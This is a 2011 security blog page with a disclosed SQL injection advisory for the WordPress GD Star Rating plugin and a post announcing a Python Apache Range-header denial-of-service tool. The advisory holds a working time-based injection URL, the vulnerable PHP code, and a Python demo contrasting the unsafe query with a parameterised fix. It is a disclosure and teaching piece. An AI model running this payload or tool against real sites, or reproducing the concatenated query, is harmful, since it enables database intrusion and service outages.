Wednesday, October 12, 2011

WordPress GD Star Rating plugin <= 1.9.10 SQL Injection Vulnerability

# Exploit Title: WordPress GD Star Rating plugin <= 1.9.10 SQL Injection Vulnerability
# Date: 2011-09-26
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/gd-star-rating.zip
# Version: 1.9.10 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/gd-star-rating/export.php?ex=user&us=dummy&de=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
./export.php
    require_once("./code/cls/export.php");
    ...
    if (isset($_GET["ex"])) {
        $export_type = $_GET["ex"];
        ...
        switch($export_type) {
            case "user":
                header('Content-type: text/csv');
                header('Content-Disposition: attachment; filename="gdsr_export_'.$export_name.'.csv"');
                $sql = GDSRExport::export_users($_GET["us"], $_GET["de"], $get_data);
                $rows = $wpdb->get_results($sql, ARRAY_N);

./code/cls/export.php
    class GDSRExport {
        ...
        function export_users($user_data = "min", $data_export = "article", $get_data = array()) {
            ...
            $where = array();
            ...
            $where[] = "v.vote_type = '".$data_export."'";
            ...
            $j_where = join(" and ", $where);
            ...
            return sprintf("select %s from %s where %s order by u.id",
                    $j_select, $j_tables, $j_where);
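
As an added example (not the plugin's code), the concatenation from export_users() above next to a hardened builder that allowlists the `de` value and binds it as a parameter. The table layout, sample rows and any vote type other than "article" are constructed assumptions, and SQLite stands in for MySQL, so the PoC's MySQL-only IF()/BENCHMARK() is rejected as an unknown function instead of burning CPU.

```python
import sqlite3

# Constructed sample rows: the plugin's real table layout is not given in the advisory.
SAMPLE_USERS = [(1, "alice"), (2, "bob")]
SAMPLE_VOTES = [(1, "article", 5), (2, "article", 3), (2, "thumb", 1)]
# The advisory's PoC value for the `de` parameter, URL-decoded.
POC_DE = "-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)-- "
# "article" is the default shown in the advisory; the plugin's full set of vote types is assumed.
ALLOWED_VOTE_TYPES = {"article"}
SELECT = ("select u.name, v.vote from users u join votes v on v.user_id = u.id "
          "where %s order by u.id")

def export_users_unsafe(data_export):
    """Mirrors export_users(): the `de` value is concatenated straight into WHERE."""
    where = ["v.vote_type = '" + data_export + "'"]
    return SELECT % " and ".join(where)

def export_users_safe(data_export):
    """Hardened form: allowlist, then bind (WordPress: $wpdb->prepare("... = %s", $x))."""
    if data_export not in ALLOWED_VOTE_TYPES:
        raise ValueError("unexpected vote type: %r" % data_export)
    where = ["v.vote_type = ?"]
    return SELECT % " and ".join(where), (data_export,)

def run_query(sql, params=()):
    """Run `sql` against a fresh in-memory SQLite database seeded with the sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users (id integer, name text)")
    con.execute("create table votes (user_id integer, vote_type text, vote integer)")
    con.executemany("insert into users values (?, ?)", SAMPLE_USERS)
    con.executemany("insert into votes values (?, ?, ?)", SAMPLE_VOTES)
    try:
        return con.execute(sql, params).fetchall()
    finally:
        con.close()

def attacker_controls_sql(data_export):
    """True when the unsafe builder lets `de` alter the statement itself: SQLite refuses
    the IF()/BENCHMARK() the PoC smuggles in, whereas a bound string simply matches nothing."""
    try:
        run_query(export_users_unsafe(data_export))
        return False
    except sqlite3.OperationalError:
        return True

if __name__ == "__main__":
    print(run_query(*export_users_safe("article")))          # [('alice', 5), ('bob', 3)]
    print(attacker_controls_sql(POC_DE))                     # True
    print(run_query(SELECT % "v.vote_type = ?", (POC_DE,)))  # []  (bound value is just data)
```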

p.s. The author has been contacted, fixed it in the latest version, acknowledged it in the Changelog and agreed to public disclosure.

Monday, October 3, 2011

KillApachePy (CVE-2011-3192)

If you are following security trends then you've probably heard about the DoS attack against a large number of Apache versions using a specially crafted Range header (CVE-2011-3192). Based on the original PoC (here) I've made a Python version of it which is more user friendly and has a few program workflow enhancements, like (safe) automatic usage of the maximum (system) allowed thread number. Consider it a properly (re)written piece of code to suit my own personal taste; from my point of view it works better than the original.

You can find the latest source code revision of KillApachePy here.
update: with the latest v0.1c you can set the HTTP method manually (try to set it to GET :)